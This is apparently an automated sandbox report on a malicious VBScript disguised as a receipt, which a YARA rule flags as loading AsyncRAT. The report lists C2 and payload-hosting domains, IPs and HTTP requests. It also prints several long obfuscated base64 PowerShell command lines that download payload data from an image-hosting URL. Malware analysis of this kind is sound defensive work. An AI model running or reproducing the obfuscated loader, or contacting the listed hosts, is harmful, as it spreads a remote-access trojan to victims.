Windows Analysis Report
I7336446-receipt.vbs

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: xwormay8450.duckdns.org

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: pastebin.com

Uses dynamic DNS services

Source: unknown

DNS query: name: xwormay8450.duckdns.org

Source: global traffic

TCP traffic: 192.168.2.6:49710 -> 12.221.146.138:8450

Source: moquenqueiro.vbs.9.dr	Binary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport><force/></analyze_input> - obfuscation quality: 4
Source: moquenqueiro.vbs.9.dr	Binary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport></analyze_input> - obfuscation quality: 4

Source: global traffic	HTTP traffic detected: GET /images/004/773/797/original/new_image.jpg?1713882029 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /images/004/773/797/original/new_image.jpg?1713882029 HTTP/1.1Host: uploaddeimagens.com.br
Source: global traffic	HTTP traffic detected: GET /nm/xwomay.txt HTTP/1.1Host: www.evolve27.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 172.67.19.24 172.67.19.24
Source: Joe Sandbox View	IP Address: 12.221.146.138 12.221.146.138
Source: Joe Sandbox View	IP Address: 172.67.215.45 172.67.215.45

Source: Joe Sandbox View	ASN Name: ATT-INTERNET4US ATT-INTERNET4US
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic

HTTP traffic detected: GET /raw/8RAqVdhv HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: pastebin.comConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /raw/8RAqVdhv HTTP/1.1Accept: /Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /images/004/773/797/original/new_image.jpg?1713882029 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /images/004/773/797/original/new_image.jpg?1713882029 HTTP/1.1Host: uploaddeimagens.com.br
Source: global traffic	HTTP traffic detected: GET /nm/xwomay.txt HTTP/1.1Host: www.evolve27.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: pastebin.com
Source: global traffic	DNS traffic detected: DNS query: uploaddeimagens.com.br
Source: global traffic	DNS traffic detected: DNS query: www.evolve27.com
Source: global traffic	DNS traffic detected: DNS query: xwormay8450.duckdns.org

Source: wscript.exe, 00000000.00000003.2314117552.000001EA10470000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2308080003.000001EA1046E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2313691853.000001EA10442000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2315728966.000001EA10440000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2056061781.000001EA10450000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2056339662.000001EA1046E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2313719726.000001EA0E63F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2313505324.000001EA0E6F6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2315745147.000001EA10446000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2056132285.000001EA1046E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2056094521.000001EA0E669000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2313761482.000001EA0E65B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2314174582.000001EA0E669000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2056263648.000001EA1046E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2312690781.000001EA1046E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2056226162.000001EA1046E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2315425220.000001EA0E6F6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2056039902.000001EA0E65B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2056380505.000001EA1046E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2056301621.000001EA1046E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2314734978.000001EA10445000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://app01.system.com.br/RDWeb/Pages/login.aspx
Source: wscript.exe, 00000000.00000003.2056432592.000001EA1044F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2056418438.000001EA1044B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2056196365.000001EA10445000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://app01.system.com.br/RDWeb/Pages/login.aspx0
Source: wscript.exe, 00000000.00000002.2315405942.000001EA0E68E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2313245780.000001EA0E68C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://app01.system.com.br/RDWeb/Pages/login.aspx4
Source: wscript.exe, 00000000.00000003.2314117552.000001EA10470000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2308080003.000001EA1046E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2056339662.000001EA1046E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2056132285.000001EA1046E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2056263648.000001EA1046E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2312690781.000001EA1046E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2056226162.000001EA1046E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2056380505.000001EA1046E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2056301621.000001EA1046E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://app01.system.com.br/RDWeb/Pages/login.aspxd
Source: powershell.exe, 00000005.00000002.3140393959.000001FD4C510000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoftF
Source: powershell.exe, 00000007.00000002.2914568318.0000017BBAA7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000007.00000002.2563131068.0000017BAAC33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000005.00000002.3101307570.000001FD3437C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2563131068.0000017BAAA11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000007.00000002.2563131068.0000017BB0EFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://uploaddeimagens.com.br
Source: powershell.exe, 00000007.00000002.2563131068.0000017BAAC33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000007.00000002.2562563265.0000017BA897F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000005.00000002.3101307570.000001FD34337000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000005.00000002.3101307570.000001FD3434A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2563131068.0000017BAAA11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000007.00000002.2914568318.0000017BBAA7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000007.00000002.2914568318.0000017BBAA7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000007.00000002.2914568318.0000017BBAA7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000007.00000002.2563131068.0000017BAAC33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: wscript.exe, 00000000.00000002.2315993674.000001EA107F4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2312950211.000001EA107F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.comMicrosoft
Source: powershell.exe, 00000007.00000002.2914568318.0000017BBAA7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: wscript.exe, 00000000.00000003.2056301621.000001EA1046E000.00000004.00000020.00020000.00000000.sdmp, I7336446-receipt.vbs	String found in binary or memory: https://pastapohyalbin.com/raw/8RAqVdhv
Source: wscript.exe, 00000000.00000002.2315993674.000001EA107F4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2312950211.000001EA107F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/
Source: wscript.exe, 00000000.00000002.2315993674.000001EA107F4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2312950211.000001EA107F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/l
Source: wscript.exe, 00000000.00000003.2312619209.000001EA1045E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2315993674.000001EA107F4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2315728966.000001EA10440000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2315814040.000001EA10770000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2312950211.000001EA107F4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2315745147.000001EA1046A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2314290464.000001EA10975000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2314768115.000001EA1046A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/8RAqVdhv
Source: wscript.exe, 00000000.00000002.2315993674.000001EA107F4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2312950211.000001EA107F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/8RAqVdhvKos
Source: wscript.exe, 00000000.00000002.2315993674.000001EA107F4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2312950211.000001EA107F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/8RAqVdhvl
Source: wscript.exe, 00000000.00000003.2313245780.000001EA0E6E1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2315425220.000001EA0E6E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/8RAqVdhvtart
Source: powershell.exe, 00000007.00000002.2563131068.0000017BAAC33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uploaddeimagens.com.br
Source: powershell.exe, 00000007.00000002.2562847549.0000017BAA330000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706

Source: unknown	HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.6:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.215.45:443 -> 192.168.2.6:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 131.153.147.50:443 -> 192.168.2.6:49709 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000B.00000002.3360198407.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6792, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 1672, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 8818
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 8818			Jump to behavior

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Network Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{093FF999-1EA0-4079-9525-9614C3504B74}

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_01121300	11_2_01121300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_011239B1	11_2_011239B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_01123FA8	11_2_01123FA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_01121878	11_2_01121878

Source: I7336446-receipt.vbs

Initial sample: Strings found which are bigger than 50

Source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000B.00000002.3360198407.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Process Memory Space: powershell.exe PID: 6792, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 1672, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.spre.troj.expl.evad.winVBS@13/13@5/4

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\8RAqVdhv[1].txt

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:992:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1464:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Mutant created: \Sessions\1\BaseNamedObjects\5SZ3fDyURUpUFMlG

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_meb2bckw.vph.ps1

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\I7336446-receipt.vbs"

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\desktop.ini

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: I7336446-receipt.vbs	ReversingLabs: Detection: 21%
Source: I7336446-receipt.vbs	Virustotal: Detection: 14%

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\I7336446-receipt.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTre